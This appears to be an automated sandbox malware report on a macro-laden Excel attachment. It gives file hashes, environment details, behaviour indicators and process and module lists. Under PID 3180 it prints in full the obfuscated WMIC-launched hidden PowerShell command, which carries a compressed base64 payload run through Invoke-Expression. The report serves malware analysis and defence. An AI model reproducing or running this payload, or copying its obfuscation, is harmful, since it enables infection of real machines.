General Info

File name

2019_EmailCliente_0000065445_Allegato1_20190515061941.xls

Full analysis
https://app.any.run/tasks/43211b38-4f77-461e-8a6d-89e1554073e3
Verdict
Malicious activity
Analysis date
5/15/2019, 11:41:03
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue May 14 12:03:07 2019, Last Saved Time/Date: Tue May 14 12:04:16 2019, Security: 0
MD5

e1efe2294e119532b08aec2206063cdb

SHA1

453ab25e9946ef43b9e0e56269b6afea7ebf8c22

SHA256

2a6e1032040b6520ccabda4a8b5a71cbab0af314b1d7732e9bf126004b9c1cdc

SSDEEP

1536:k0in1DN3aMePUKccCEW8yjJTdrBZq8/7k3hOdsylKlgryzc4bNhZFGzE+cL2knAa:k0in1DN3aM+UKccCEW8yjJTdrBZq8/7u

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 2952)
Creates files in the user directory
  • powERSHELl.exe (PID: 3084)
Uses WMIC.EXE to create a new process
  • EXCEL.EXE (PID: 2952)
Creates files in the user directory
  • EXCEL.EXE (PID: 2952)
  • EXCEL.EXE (PID: 2088)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 2952)
  • EXCEL.EXE (PID: 2088)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.xls
|   Microsoft Excel sheet (48%)
.xls
|   Microsoft Excel sheet (alternate) (39.2%)
EXIF
FlashPix
Author:
null
LastModifiedBy:
null
Software:
Microsoft Excel
CreateDate:
2019:05:14 11:03:07
ModifyDate:
2019:05:14 11:04:16
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts
null
null
HeadingPairs
null
null
null
null
CompObjUserTypeLen:
31
CompObjUserType:
Microsoft Excel 2003 Worksheet

Screenshots

Processes

Total processes
53
Monitored processes
13
Malicious processes
1
Suspicious processes
0

Behavior graph

+
start excel.exe no specs rundll32.exe no specs mctadmin.exe no specs explorer.exe no specs excel.exe no specs wmic.exe no specs powershell.exe no specs ping.exe no specs cmd.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2088
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\winmm.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3816
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\kbdit.dll
c:\windows\system32\kbdus.dll

PID
1864
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
180
CMD
"C:\Windows\explorer.exe"
Path
C:\Windows\explorer.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Explorer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\slc.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\actxprxy.dll

PID
2952
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\winmm.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
3180
CMD
wMIC "proCESs" 'CaLl' 'crEATE' "powERSHELl -noPro -windowstYL hIDDeN -nonInte -exeCuTIOnP bypASs $1K = [StrinG][ChAR]34 ;$KJ3= ([CHAR]44).ToSTRInG() ;"\"( .(${1K}{1}{2}{0}${1K}-f 'T'${KJ3}'nE'${KJ3}'W-objec') (${1K}{6}{5}{0}{3}{2}{8}{1}{7}{4}${1K}-f'I'${KJ3}'e'${KJ3}'cOMPRESSION.'${KJ3}'o.'${KJ3}'TEsTREam'${KJ3}'Ystem.'${KJ3}'S'${KJ3}'Fla'${KJ3}'d')([syStEm.Io.mEmorYstREam] [cONVeRt]::${1K}Fr`om`BasE6`4sT`RiNg${1K}((${1K}{9}{41}{37}{28}{2}{92}{89}{75}{40}{33}{58}{94}{1}{17}{52}{49}{93}{59}{54}{64}{63}{45}{36}{70}{66}{15}{13}{22}{12}{65}{39}{61}{10}{7}{81}{87}{29}{95}{96}{79}{23}{44}{18}{71}{42}{20}{24}{82}{25}{69}{38}{30}{5}{0}{88}{97}{77}{78}{67}{55}{27}{62}{84}{48}{76}{90}{80}{21}{74}{31}{16}{56}{43}{47}{35}{11}{73}{72}{83}{19}{98}{57}{50}{53}{85}{32}{51}{46}{91}{6}{34}{26}{60}{4}{86}{8}{14}{3}{68}${1K}-f 'A5WT4Ysfzc'${KJ3}'9qMq2pivVle3JZbbOIhBeFCyVDVxqqJvQkMViBROixQTBBEMga'${KJ3}'4xVg3fZ78OUR9V8'${KJ3}'X377s08+/PP7zeP348y/Tl0+P18'${KJ3}'Z5TiLVA39KotEnX8m9JX/F2JO4awWO6'${KJ3}'NIzLZMqznSDYjZsoP2Nr'${KJ3}'+'${KJ3}'BoYnCuEIfgVcnQyhezoy8RWTbgJDd3bnrDaUEYNHOsaiaNHYi0qJY3kdL7t'${KJ3}'rXS0t3GdynTydk1V2TJd2anb'${KJ3}'PZhbq+XGFYT/yn4wOefgxPS9g99ELshBxCYTUGAY9OAIWTDYMBz0kui/p77qPXnYsC+t7nWpqlW9H797vD6++TD/5fNy/vlj/PSt3u+flx/+/THmT9++/OvlTb+/Pl5KuGrYSzhjbGssdY6pr7U'${KJ3}'nYbNCqyWgyTkLKcbshQVKGkSlFJKKP4lctGY7pV09RGmcBk9xOEfPrw9DUerU7aWnugknEHM'${KJ3}'FwsjnxX'${KJ3}'pEzOlhHQRv8IIEqQXycLCL+KGMtDzM0CvFxaLRVOmoasW'${KJ3}'qPdOF2wglcTS4pcEh9GeqSh+zBvtS3UVfVDoWriXMOM72HFbIZl3RK6FK0JwDOU'${KJ3}'KA9f48t2Hnz7/8M/Xl2s7pn2+l/V8eXv89/H'${KJ3}'Q1p57l3CANSBlwdATNVj6VA92WbWnPwpgwm'${KJ3}'Kp0ZqXIeMBDbnGhUo+GeY/wRrNRMi9GOj2'${KJ3}'zPMO'${KJ3}'z2ZNUgZi56'${KJ3}'4wa8yHapYhvCWOAUvRgh3mat6TFlriK2i77VeEM3cBlVetPTe1E/cf5meCXnVUAP+PoUP1zbNxGWPygkzYxVCIak93mhJjLv9IH1fjZgd'${KJ3}'mRgS3boLFcAgA'${KJ3}'6tC4ecVgmY6A0LTMhqsFxLe+cxNJzkZLj'${KJ3}'ElBW+PKk6'${KJ3}'QacEfD2Va77NzwJrdQSTt850MI'${KJ3}'N'${KJ3}'fNc9WB05PN0egBR0oNgGVQ9y375QY9MY3RxH'${KJ3}'GHPa6o005sv3HbIduw19RcFUFymUs7q4yWX/e7P7Kt7HPwDVfzkcvqwFcNuZ0x70X/8+0KGn/4Y4LIeJGnI3sS1e5aiUX+UeySx'${KJ3}'ELK5eegfOLUxPoMZ4CF7DivQFwlszaf5CdlSu'${KJ3}'JZa'${KJ3}'E'${KJ3}'hM'${KJ3}'9fcKfZyWMAiDGqgzliJBU4Utz7NCg3OJF1Ufw4ELdmRG+TUg9xDBJGxNGOPNQt4e6PKMYB4'${KJ3}'ucTgbleyy+qZM1D4Gbq4GPJ'${KJ3}'TqA9/F2sEUHtLzrgM1bjMDvWOtZw6EAY86ce48s9ZZNKguIdNFDZ8xx9iat6Oykw+r+3GSKua7a4lRM2'${KJ3}'Wk++j8YGw9RqG4C'${KJ3}'r'${KJ3}'9o2md0KIRzApojwNan5k1FSRIXO5iATwOatE1c+uu'${KJ3}'sfY7ljTHmK4Yqt7nO6ZylrCVcMcYrxj7XdsdW15iK1NMadHC'${KJ3}'zU'${KJ3}'hO8fCypp97'${KJ3}'o+j4pkqjTa59jbWdtuw4+tJkCa'${KJ3}'u'${KJ3}'6DVEJdwQvWu/lA7z7U2WSg1HgxSYFeEZU+GxOlAkwR3ArXMBCRR3BT39GIK3IOj2JQMfHn+IhLkoa'${KJ3}'ZmBDqwogWBwqX7Trm69Y7X2Vi7kQHqG+R9whi+7ERtcfniXRDofNm5EXllhCKJ1XHcxnASGpAEWwqVnzycCyK7W'${KJ3}'epq'${KJ3}'dV1InkQm/GC8RoKiJBakmip'${KJ3}'EpSW88JdEPGSRCkhF'${KJ3}'6OLWcEYnXRlY+fICfl63iOEE'${KJ3}'UOJA/'${KJ3}'BNUs6E'${KJ3}'gvkeKjAjT7V0BnEjFnYNRPWaSHZ3sFPSmHzd'${KJ3}'R7KHOIMgHK98jAjgu2F21Nh'${KJ3}'mo3vMKa1PpquKlVKFtPa7umKrYBJES56ZC'${KJ3}'dxgcTT0W+6u7PyNpXH8rIECfxGK'${KJ3}'UbgE3sKnms+KBE2UHGVqiiaRC0BUMxS5Uu5hqWArnE0tKWC5rW4+'${KJ3}'6YN6k5vKEdYMcDJJ4qQTep'${KJ3}'Wuga0w7/ocmcb+YfXe'${KJ3}'bWQXMTQCk3'${KJ3}'iruz3UjmFpdOBL'${KJ3}'GrjGI4LS4/jia6XMNhUs8ie9WqkoUK3dhFSIxM93zLZbKry2oTTHK8W96YSk1Ysc1OLazzdljC6l3mU6iUV'${KJ3}'5wi14au7OM9ThDEJ'${KJ3}'vLuwSMaRnxoTYh7xqCv6Tp0VGoTip4xSRJ1bEQqEKgNPa'${KJ3}'JuO'${KJ3}'YVxEaeiGCjg5xLbKEAl1+N39yt3UkVBQWtg3AZVNjWD0'${KJ3}'dctxil0Fou3EW7NO09aFlAUp90dZFTCtOia6CZYhjlABJBVVyNR2b5FGwQzzi6SoelO5UyMlUl'${KJ3}'wWC2jl41gk3ZNlIpGq7'${KJ3}'ZNQv'${KJ3}'qcMtMKxRaavRz46M9ucYC/wNRK31J4BdEW92Y143i2yeJ6snixM4r4x5pDLjJUKw/IFcRtlqwzt/BQU6IeJ1W'${KJ3}'fHP/3492v/8v7p++/ffzx/fY/t9fH6zfbd+28f3v9x/nq8vr09fv/Hx9vj7e1+e/zhb1rzeNFu/wM='${KJ3}'hEK9CRPvTFuaTJTYKISTuoFaq6Kt'${KJ3}'pbjK3Ntapgzb1SbaGX9tHXoDOqwmFwwBk'${KJ3}'ZQOJ2O8wYriHy8BSApmcLGJFViIs35XeieqwPQbU0YxNC5'${KJ3}'N1PJNB'${KJ3}'WK2hlm+2VUWpQ0bqfGFiWj'${KJ3}'l4s4yccl5hNyh4sqvNk2CRNQ4ayDx'${KJ3}'GlHolZ'${KJ3}'f9/MWBCS0FV74AMMhKhplCBvFNnKFAwcysnDw'${KJ3}'81Q9vAWuWUnmFWCMhOoevgulipLpHKtC+qdykAS'${KJ3}'1rI+xZScS0eFFBi2rl4GrMcR0SkBLKpmm'${KJ3}'UJ'${KJ3}'Y1Z2PMoFHhMVxAU'${KJ3}'i9VYlK9qdjFpFoglBbVS9LPRaQ2+Tso8'${KJ3}'IFrV0yBGVzWUOg3XFhVQwe'${KJ3}'AnSeR4TwXcKNYaco6+dNpC+qKaBbQEa2wloPa'${KJ3}'yrS4TeOX09MgUJx00b0c6IHgQ6cirJxMoX7YZRFyG5YzDF9KW0pb'${KJ3}'DMkLX1l'${KJ3}'A88ga+9B/TQo1Q+mwvXyU7vnu'${KJ3}'KqbDgrxCy8w'${KJ3}'E1hhzA6HYjp4VSV66hqtUTSLRgqm3bw9DR38jMd9'${KJ3}'owEkHatt0j32yfiparFjiodOWSoR51cpVJ+jEc'${KJ3}'NlMIXB8tLsdg'${KJ3}'ijIW7fRdjl7boNbt65yTkQNhwVL0HCAQyY7pev4bcY6ruDIXToexZ/lu32HQM9p8DxlJeXJ6'${KJ3}'6xd1p82l6DFjX9wMI+1Xr'${KJ3}'jXrm8tHS3r0DC1vlJLNYrjQ'${KJ3}'U7pE4U2P7MzYVoBU9Uqeetq4SlkaSJHXqQR2gg0LUyswTR2sT61O+vD1NqDSgnTF05bIUglXhUpvdEtWfsrbGIrU2juRTWFqYdL4+'${KJ3}'5cQAJhaLJw3vArTnX'${KJ3}'T0t0NGSoQ0RiwpfHQSVSWbLahQF9BSp2YzgjCp1wgYiO9WqHnXCAdMxzBV5d3o68jCPwHtBiZ'${KJ3}'mu2a6lB+/XbQGGiOmamMsbRZBLE+BQRrC0eI4sbNE5BEywjJjqL0veEU6/0UwsW9NwMxL0/RRN4G0SHGLJm3Oa24n'${KJ3}'IO3wLU'))${KJ3} [syStEm.Io.CoMPressioN.COMprEssionmode]::${1K}dECOm`p`RESs${1K} )|&(${1K}{1}{0}{2}${1K}-f 'E'${KJ3}'foR'${KJ3}'aCh') { .(${1K}{2}{0}{1}${1K} -f '-o'${KJ3}'bjecT'${KJ3}'nEW') (${1K}{3}{2}{4}{0}{1}${1K}-f 'm'${KJ3}'reaDER'${KJ3}'o.str'${KJ3}'SYSTem.i'${KJ3}'Ea')( `${_} ${KJ3} [sysTEM.tExT.enCODiNg]::${1K}a`scII${1K})} ).${1K}rEAd`ToEnD${1K}( ) |&( `${VER`BOsE`pre`Fe`REnce}.${1K}tOS`TrIng${1K}()[1${KJ3}3]+'x'-JoiN'')"\" | &( $pshOme[21]+$pSHome[30]+'x')"
Path
C:\Windows\System32\Wbem\wMIC.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
